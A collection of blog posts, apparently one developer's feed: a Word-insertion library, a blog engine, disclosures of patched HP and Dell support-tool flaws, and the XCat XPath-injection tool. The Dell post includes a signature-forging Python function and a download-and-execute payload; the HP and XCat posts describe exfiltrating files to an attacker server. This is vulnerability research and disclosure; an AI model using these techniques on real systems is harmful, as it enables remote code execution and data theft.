HtmlToWord is now WordInserter

I've released a redesign of my HtmlToWord library, specifically it now supports Markdown and multiple different ways to interact with Word. It's now also been renamed to WordInserter to reflect this.

Originally HtmlToWord was designed to take HTML input, process it and then insert a representation of it into a Word document. I made this for a project at my work involving taking HTML input from a user (created using a WYSIWYG editor) and generating a Word document containing this. I was surprised to find no native way to do this in Word (other than emulating copy+paste, eww), so I made and released HtmlToWord. That library was tied directly to HTML, each supported tag was a individual class responsible for rendering itself.

This quickly got messy, and in a future version of the project for work Markdown was used instead, so I decided to re-write the library from scratch to handle this. HtmlToWord uses the HTML input to create a number of objects, one for each tag, and then calls a Render method on each of them. As WordInserter needs to process both HTML and Markdown I decided to better decouple the parsing from the rendering, otherwise the library would be full of duplicate code. It now takes some supported input and creates a tree of operations to perform which is then recursively fed to a specific renderer responsible for processing it.

The result of this is the code is a lot cleaner and more maintainable, and it supports different ways to take the input and insert it into Word. Currently only COM is supported, but in the future if other projects that directly manipulate .docx files mature a bit I can create a renderer that works on Linux.

Using the library is super simple:

from wordinserter import render, parse
from comtypes.client import CreateObject

# This opens Microsoft Word and creates a new document.
word = CreateObject("Word.Application")
word.Visible = True # Don't set this to True in production!
document = word.Documents.Add()
from comtypes.gen import Word as constants

markdown = """
### This is a title

![I go below the image as a caption](

*This is **some** text* in a [paragraph](

  * Boo! I'm a **list**

operations = parse(markdown, parser="markdown")
render(operations, document=document, constants=constants)

I have also created an automated test script that renders a bunch of HTML and Markdown documents in both FireFox and Word. This is used to make a comparison document to quickly find any regressions or issues. Judging by the number of installs from PyPi and the number of other contributors to the Github project this library is useful to some people, I hope that they take a look at the redesign.

Here is a snapshot of the top of the comparison page:

HP Support Solutions Framework Security Issue

After discovering the flaw in Dell's System Detect software I looked into other similar software for issues. This post details two issues I found with the HP Product Detection software and explores the protections HP put in place. I'm also going to explain how they could be easily bypassed to allow an attacker to force files to be downloaded, read arbitrary data, registry keys and system information through the users browser with little or no interaction.


HP were incredibly prompt at fixing the issue and responding to communications. They have addressed these problems in a new version (11.51.0049) and have issued a security notification, available here. An updated version can (and should) be downloaded from their support page

  • 25/3/2015 - Contacted HP with a writeup and received an acknowledgement that it has been passed to the relevant software team
  • 10/4/2015 - Received notification that the vulnerability has been fixed


Many large hardware vendors offer tools to automatically detect the hardware configuration of users machines to take them to the exact drivers that they require. Just like Dell, HP feature this software prominently on their support landing page.

Unfortunately just like Dell the HP software contains a number of functions that you wouldn't expect. When you click "Find Now" you are actually downloading the complete HP Support Solutions Framework which includes functionality to:

  • Read arbitrary files and registry keys
  • Collect system information
  • Summarize installed drivers and devices
  • Initiate the HP Download Assistant to download arbitrary files

The program also attempts to send any collected data back to HP servers and also attempts to stop anyone but the HP support staff accessing it, but as I will demonstrate these checks are easily bypassed. Due to the nature of the software this means that any of these functions can be invoked by any web page you visit without any notification, and combined with the fact that the program shows no visible sign of running and it starts with the machine automatically means this is a very dangerous piece of software.

The juicy details

As previously stated the software installs a service on your computer and listens for HTTP requests on localhost:8092. The JavaScript in your browser then communicates with this service by making AJAX requests to that local port. Below shows the page fetching the version information of the installed software:

When a browser makes a HTTP request the browser adds some information to the headers about the page or context that initiated the request, in the Referer (yes, spelt like that) and Origin headers. Under usual circumstances these requests would be coming from the HP support site, so the Referer header might have a value of

So let's get right into the code and see how these headers are used. After decompiling the software we find the following (abbreviated) function inside SolutionsFrameworkService.SsfWebserver:

private void GetContextCallback(IAsyncResult result)
   string uriString;
   if (request.QueryString.Get("callback") != null)
      uriString = request.Headers["Referer"] ?? "";
     uriString = request.Headers["Origin"] ?? "";

   if (!new Uri(uriString).GetComponents(UriComponents.Host, UriFormat.Unescaped).EndsWith(""))
     ... error
     ... process request

The line we need to focus on is this:

if (!new Uri(uriString).GetComponents(UriComponents.Host, UriFormat.Unescaped).EndsWith(""))

In English this translates to if the hostname ends with, which is the only way the program authenticates a valid request. On the face of it this might look like a perfectly valid way to ensure that a HTTP request came from a valid HP domain however it is critically flawed. The check only checks if the domain ends with, so if a hacker were to register the domain and make a request from there then it would pass the check. Apart from giving me Déjà vu it also gives me a foot in the door - any command I issue will be processed by the software. So let's see what commands can be processed.

Triggering a download

When the program processes a request it inspects the first two components of the requested path. The first is used to look up a controller, and the second component (if present) specifies the method. In the Chrome screenshot above it is making a request to the version controller, which has one default action that returns the software version. Looking through the source there are several interesting controllers, but we shall start with the HPDIAcontroller which is used to drive the "HP Download and Install Assistant". The actual code is pretty convoluted and not particularly relevant, but what is interesting is that if we make a request to (some unimportant parameters omitted):


Then this triggers the download assistant to start, which brings itself to the foreground downloads the file:

I looked long and hard but the software doesn't automatically install anything without user interaction. However this doesn't render the attack useless, far from it. The attacker is able to control the displayed file title ("update.exe" in the screenshot) and can completely hide the real executable name by calling it "_.exe", which causes the download assistant to display "(.exe)" after it. One redeeming feature of this software is that it only accepts download requests for files that are served over HTTPS.

If an inexperienced user were to visit an malicious page that looked like a real HP site telling them to update their software and the HP download manager pops up I think many might press install, which would execute the attacker's malware and compromise their machines. For some advanced malware merely being downloaded could be enough.

Edit: Funnily enough I told my housemate about this and he said he had the HP download assistant pop up once while browsing a "dodgy torrent site". Perhaps this was already known?

Harvesting users information

The software contains a large number of "harvesters" (named so in the code) which can be used to steal files from the users machines and read other system information like registry keys or driver details. This attack is bit more complex and targeted than the one above, but could be even more dangerous if executed correctly.

When an HP support technician attempts to diagnose problems with a customer's computer they may need to read specific files on the user's computer, or access other possibly sensitive information. The normal and legitimate steps taken by the software when a technician wishes to read information from the users machines are as follows (please excuse my terrible diagrams):

  1. The support technician issues a request to the program instructing it to run the "idfservice" controller
  2. This controller then makes an HTTP request to the host, with the product line of the HP machine the user is using. This returns a list of files to harvest
  3. The program then reads the specified portions of the files and sends them back to
  4. The support technician presumably accesses this information to diagnose any issues.

You can view an example of the servers response by visiting the following URL:, and below is a snippet of the result that instructs the software to read a registry key:

      <MatchExpression i:nil="true"/>
                ^HPSAVer: (\d{1,5}[.]\d{1,5}[.]\d{1,5}[.]\d{1,5}|[a-zA-z]+)$
      <Name i:nil="true"/>

This isn't actually a terrible system, because the system contacts an authoritative service to retrieve a list of files to download rather than accept this data from the client directly.

So how can an attacker exploit this? He or she need to trick the application into connecting to their server instead of one hosted by HP. One possible way to do this is to use a DNS spoofing attack (like DNS cache poisoning) so that the domain resolves to an IP address they control. Another possible way is to man in the middle their connection, as they use a plaintext HTTP request to send and receive data. How to exactly do this is outside the scope of this post but it is possible.

Once done, the attacker can make the request to the users software and it will connect back to a machine that they control, which will instruct the software to read any file they choose. Thus the following happens:

  1. Attacker triggers the users browser into making a crafted request to the idfservice controller
  2. Program resolves the to an attacker controlled IP and makes a request for files to read. The attacker returns a list of files he or she wants to read
  3. The program collects these files and sends them back to the diagsgmdextpro address, simply giving the data to the attacker.

As you can see from the sample XML above for each bit of data we read there has to be some form of filter in the form of a regular expression. We can simply use the expression .* to match the entire file. In the screenshot below I have made a simple web application that serves a malicious page that instructs the software to read C:\secret.txt and the user's system information. The console window to the left shows that the program has dutifully sent the data to the attacker controlled server.


I've described two flaws with the HP Solutions Framework that can be exploited to potentially compromise a users machine without much/any user interaction. While the first attack is not as bad as Dell's (which requires no user interaction at all) it could be just as dangerous to nontechnical users who might not consider a random HP download window popping up to be suspicious.

The second attack is more targeted than the first and requires more setup, but could be used to read sensitive user documents or information and pass it back to the attacker. This should be mitigated first by using HTTPS and second by explicitly verifying the servers SSL certificate to ensure it is connecting to a valid HP controlled server.

While I don't want to be too critical of HP because their response was prompt and speedy I do think that their security procedures are lacking if such software can be published by them. That being said they do make it clear to users that they are downloading the entire Support Solutions Framework and explain the functionality it includes.

Dell System Detect RCE vulnerability

I recently discovered a serious flaw with Dell System Detect that allowed an attacker to trigger the program to download and execute an arbitrary file without any user interaction. Below is a summary of the issue and the steps taken to bypass the protections Dell put in place.


The issue was fixed within two months and Dell were clear in their communications throughout.

  • 11/11/2014 - Contacted Dell about the issue and received an acknowledgement
  • 14/11/2014 - Received confirmation that Dells Internal Assessment team is investigating
  • 9/1/2015 - Dell state that they have fixed the issue by introducing additional validation and obfuscation
  • 10/1/2015 - Checked patched program and could not reproduce this exploit
  • 23/3/2015 - This post is published


Anyone who has owned a Dell will be familiar with the Dell Support page. You can get all the latest drivers for your exact machine configuration from this site by entering your Dell Service Tag, which can be found on a sticker somewhere on your machine or through clicking the shiny blue "Detect Product" button.

Clicking this button prompts you to download and install the "Dell System Detect" program, which is used to auto fill the service tag input and show you the relevant drivers for your machine.

While investigating this rather innocuous looking program I discovered that it accepts commands by listening for HTTP requests on localhost:8884 and that the security restrictions Dell put in place are easily bypassed, meaning an attacker could trigger the program to download and install any arbitrary executable from a remote location with no user interaction at all.

The interesting bit

If you click the button you are prompted to download and install the "Dell System Detect" program which conspicuously sits in your taskbar and starts itself with your machine. So this program is clearly part of the process of autodetecting the service tag, but how does the browser page communicate with it? You can use Chrome's excellent developer tools to view the network traffic of the page and see that it makes several requests to a service listening on localhost port 8884:

Ok, so it seems that the Dell System Detect runs a HTTP server that listens for requests, which are sent from the Dell Support page's JavaScript. So let's take a closer look at the program - it's a .NET 2.0 executable and can be completely decompiled with dotPeek into a set of Visual Studio solutions. A quick search through the code for "http" brings us to eSupport.Common.Client.Service.RequestHandlers.ProcessRequest which is responsible for processing a request through the processes HTTP port. Below is an abbreviated snippet showing how this function authenticates that requests come from a valid Dell domain:

public void ProcessRequest(HttpListenerContext context)
    String url = "";
    if (context.Request.UrlReferrer == null) url = context.Request.Headers["Origin"];
    else url = context.Request.UrlReferrer.AbsoluteUri;

    if (absoluteUri.Contains("dell"))
        if (context.Request.HttpMethod == "GET")
        else if (context.Request.HttpMethod == "POST")

So that's our first issue: the program attempts to verify that the request is sent from a Dell domain by only checking if "dell" is in either the HTTP Referrer or Origin headers. Why is this a problem? The HTTP Referrer can contain the full request URI including the host and path. This means an attacker could easily make a request with an origin of "" and this would pass the initial test as "dell" is in the string.

Armed with this information we can make requests to the program that are at least partially processed. Inside each of the method handlers (HandleGet, HandlePost) there is a fair bit of messy code, but below is a simplified version:

private void HandleGet(HttpListenerContext context)
  string[] urlParts = context.Request.Url.AbsolutePath.Split('/');
  MethodInfo method = FindService(urlParts[0]), urlParts[1]);

  string signature = context.Request.QueryString["signature"];
  string str3 = context.Request.QueryString["expires"];
  bool verified = new AuthenticationHandler().Authenticate(urlParts[0], urlParts[1], str3, signature);
  if (!verified) return Error()

  var result = method.Invoke(GetParameters(context.Request));
  return MakeResponse(result);

This function splits the request URL by the slash and uses the first two components to find the correct service to execute. In the Chrome screenshot above we see that the web page is making a request to clientservice/isalive, which means the program will execute the isalive method in the clientservice service.

After the service has been found it inspects two query string parameters, signature and expires, and passes them to the Authenticate method. If this passes then the service is invoked with other query string parameters as arguments.

It seems obvious by now that the program does a little bit more than simply retrieve your service tag, so before we look into the Authenticate method let's see what interesting things we can do.


There are three services that can be used: diagnosticservice, downloadservice and clientservice. Within these are 25 methods, including getservicetag, getdevices, getsysteminfo, checkadminrights and downloadfiles. It seems that the entire Dell system support package is included with System Detect, meaning if we can bypass the authentication then we can trigger any of these methods.

The most interesting method is called downloadandautoinstall, which does exactly what it says on the tin.

public class DownloadServiceLogic
    public static ServiceResponse DownloadAndAutoInstall(string files)
        // Download and execute URL's passed in the files parameter without prompting the user

If we can bypass the Authenticate method then we can trigger this function which will download and execute whatever file we tell it to by making a request to http://localhost:8884/downloadservice/downloadandautoinstall. So lets take a look at the authenticate method which is the only thing stopping us:

public bool Authenticate(string service, string method, string expiration, string signature)
    var secret = string.Format("{0}_{1}_{2}_{3}", service, method, expiration, "37d42206-2f68-48be-a09a-9f9b6424ad85");
    var hash = new SHA256Managed().ComputeHash(Encoding.UTF8.GetBytes(secret));

    string stringToEscape = Convert.ToBase64String(hash).TrimEnd('=');
    bool flag = stringToEscape.ToLower() == signature.ToLower() || Uri.EscapeDataString(stringToEscape).ToLower() == signature.ToLower();
    if (!flag)
        ErrorLog.WriteLog("Not authenticated");
    return flag;

Wow. Ok, so not exactly the hardest thing to break. The service, method, expiration and signature arguments are all attacker controlled and passed through GET arguments. The only thing not controlled by a remote attacker is the hard-coded GUID "2f68-48be-a09a-9f9b6424ad85".

Essentially all the function does is create a string with the arguments and the GUID then compare it with the one the user has given, and if it is a match the user is 'authenticated'. With this information in hand we can create a simple Python function to generate a valid signature:

def make_signature(service, method):
    expiration = int(time.time()) + 400000

    secret_string = "{}_{}_{}_{}".format(
        service, method, expiration, "37d42206-2f68-48be-a09a-9f9b6424ad85"

    hashed = hashlib.sha256(unicode(secret_string, "utf-8"))
    print("Secret: {}".format(secret_string))
    print("Hash: {}".format(hashed.hexdigest()))
    return expiration, base64.encodestring(hashed.digest()).rstrip(b"\n").rstrip(b"=")

If we can generate a valid token then we can trigger the "downloadandautoinstall" method with our arbitrary file by causing the user to make a GET request, which is very very easy to do. A simple way would be to embed an image in a web page with the source set to "http://localhost:8884/downloadservice/downloadandautoinstall" with the appropriate GET arguments. After some investigation it seems that the DownloadAutoInstall method needs a list of JSON strings containing information about files to download and install. Sending a JSON object like the following with a valid signature will trigger a download:

    "Name": "messbox.exe",
    "InstallOrder": 1,
    "IsDownload": True,
    "IsAutoInstall": True,
    "Location": r""


So in conclusion we can make anyone running this software download and install an arbitrary file by triggering their web browser to make a request to a crafted localhost URL. This can be achieved a number of ways, and the service will faithfully download and execute our payload without prompting the user.

I don't think Dell should be including all this functionality in such a simple tool and should have ensured adequate protection against malicious inputs. After contacting Dell and discussing the issue with their internal security team they pushed out a fix that included obfuscating the downloaded binary. While I cannot be sure I think they simply changed the conditional from "if dell in referrer" to "if dell in referrer domain name", which may be slightly harder to exploit but just as severe. There is now also a big agreement you have to accept before downloading that specifies what the software can do.

Simple 2

I've just about finished the next version of Simple, the markdown based blog that powers this site.

When I first made Simple it was because I disliked WordPress, which seemed a bit too bloated. Then I saw Svbtle and I really liked the minimalist design (mostly the posting interface) and decided to make a clone in Python.

This worked great and powered my blog for three years or so without any issues, but I became a bit tired of the minimal white design and wanted something with a bit more to look at. When I stumbled across the HPSTR Jekyll Theme I really liked the layout and design and decided to adapt that for the next version of Simple.

And so here it is. It tries to stay true to it's name by being simple to use and install whilst still having a decent feature set and a nice design. The editing interface is a styled textarea that grows as you type, and adding an image is a simple as dragging and dropping it onto the page. This will upload the image and insert the right markdown at your cursor position. You can also edit the title by just selecting it and typing.

One thing I really liked about the HPSTR theme is the large image header, and I decided to combine this with the Bing daily image. When writing a post you can view the last 25 daily images by clicking the picture icon in the top right and using the left and right arrows to navigate:

I've tried to make installing Simple a painless as possible. You create a virtual environment for Simple, install the package and then use the 'simple' command to create a blog. Creating and maintaining config files is a pain, so you can use the simple command to create nginx and supervisord config files with the right file paths included (You will likely need to run apt-get install nginx or yum install nginx, and install supervisor to use them).

>> mkdir blog && cd blog
>> python3.4 -m venv env
>> source env/bin/activate && pip install simpleblogging gunicorn
>> simple create
>> nano
>> simple nginx_config --proxy_port=9009 > /etc/nginx/conf.d/simple.conf
>> simple supervisor_config env/ 9009 >> /etc/supervisord.conf
>> chown -R nobody:nobody ../blog
>> supervisorctl start simple && service nginx reload

And that's all you need.

Exploiting XPath injection vulnerabilities with XCat

I just released XCat 0.7, the companion tool to this paper. XCat is a command line tool to automate the exploitation of Blind XPath Injection Vulnerabilities, utilizing some pretty cool techniques.

The most interesting technique is that xcat can automate out of band attacks to massively speed up extraction of data. In English that means that it can turn a blind injection (where one request equals one bit of data) into a standard injection (where one request can result in many bits of data), essentially making the server send the data to XCat in big chunks. It also comes with a "file shell" option that allows you to access local files on the server through a variety of methods. You can find out how to install it in the documentation here:, and this post provides a summary of XCat's capabilities.


XPath is like SQL for XML. Imagine you had this XML document with a list of users:

    <user username='Tom' password='pass'/>
    <user username='Jane' password='wyf'/>
    <user username='Steve' password='abcd'/>

And you wanted to query the existence of a particular user. You could write something like this:


That query would return the user node with the attribute 'username' set to 'Tom'. There are lots of better examples on the Wikipedia page if you're interested.


Imagine if the query above was part of a form, and the code puts unescaped user input into the username part of the query. If the query finds a result it redirects you somewhere, otherwise it displays an error. An attacker could subvert the query by adding his own logic:

/root/user[@username="Tom" and @password="pass" and "1"="1"]

Now the form will only redirect if the user Tom's password is equal to "pass". Someone malicious could simply enumerate through common passwords until the form redirects, at which point they know Tom's password. XCat is built to automate this, but it takes it a step further by being able to extract any portion of the document being queried through the injection flaw as efficiently as possible. XCat can also be used to read arbitrary XML and text files on the server - in the demo below we read an XML file, a secret text file and /etc/passwd.

Example command

You need to supply XCat with some information before it can exploit an injection flaw. It needs to know the HTTP method, the URI of the page, some data which triggers a True or False page, the vulnerable parameter and a match string. In the example below that is used in the demo the vulnerable parameter is "title", and if the query is successful (i.e evaluates to true) the resulting page will have "1 results found" inside the contents.

xcat --method=GET http://localhost:8080 "title=Foundation" title "1 results found" run retrieve

Using just this information XCat can retrieve the whole XML document being queried. For XCat to read local files and speed up retrieval it needs to know how to connect back to your local machine, which means you need a public IP address. In the video below I use the --public-ip flag to specify "localhost" as my address as I am running the example site on my local machine. You can set it to "autodetect" and XCat will automatically detect your public IP. Note: Maximize the demo (bottom right) if you can't see all the commands.

XCat comes with an example vulnerable website you can test it against, powered by Jython. It also tries to be clever about how it fetches data: It can use a variety of different methods to speed up retrieval and intelligently degrades to slower techniques if faster ones are not available. This means you just need to point XCat at the vulnerability and it will do the hard work of figuring out the best way to exploit it.


XCat requires Python 3.2 or above (preferably 3.4) and can be installed via Pip:

pip install xcat

The example application can be downloaded from the Github repository

Out of band attacks

Out-of-band (OOB) metaphorically refers to activity outside of some other kind of activity. In the examples above one request can get only a True or False response, so for each request we can only gather one bit of data. We can get around this by using an OOB attack to gather many bits of data per request by utilizing an additional communication channel.

The first OOB technique utilizes the XPath doc() function to speed up retrieval. This function can be used to load both local and remote (via HTTP) XML documents as part of a query:


If XCat detects it is able to use this function it performs the following actions to speed up retrieval:

  1. Issue a query requesting the server to load an XML document from a URL, which contains part of the data we wish to extract concatenated onto the end of the URL (URL + urlencode(data))
  2. The server will request this URL and XCat can extract the information from the query string

It does this by starting its own HTTP server and listening for requests from the target server.

The second OOB technique allows the reading of local text files using XML External Entity Injection. It's quite similar to the first OOB attack but involves two stages: first XCat asks the server to load a malicious XML file which contains an XML SYSTEM entity pointing to the file we want to read, and secondly the resulting data is then sent via the first technique back to XCat. These are the steps taken:

  1. Instruct the server to load a crafted XML document served by XCat
  2. The server connects to XCat and requests the XML document
  3. XCat responds with a malicious XML document containing a SYSTEM entity
  4. The server parses this and includes the contents of the target file in the document
  5. This can be extracted and read by using the first technique

Check out the documentation for more info and examples of commands. A fair bit is missing at the moment, most noticeably support for cookies, but those should be coming at a later date.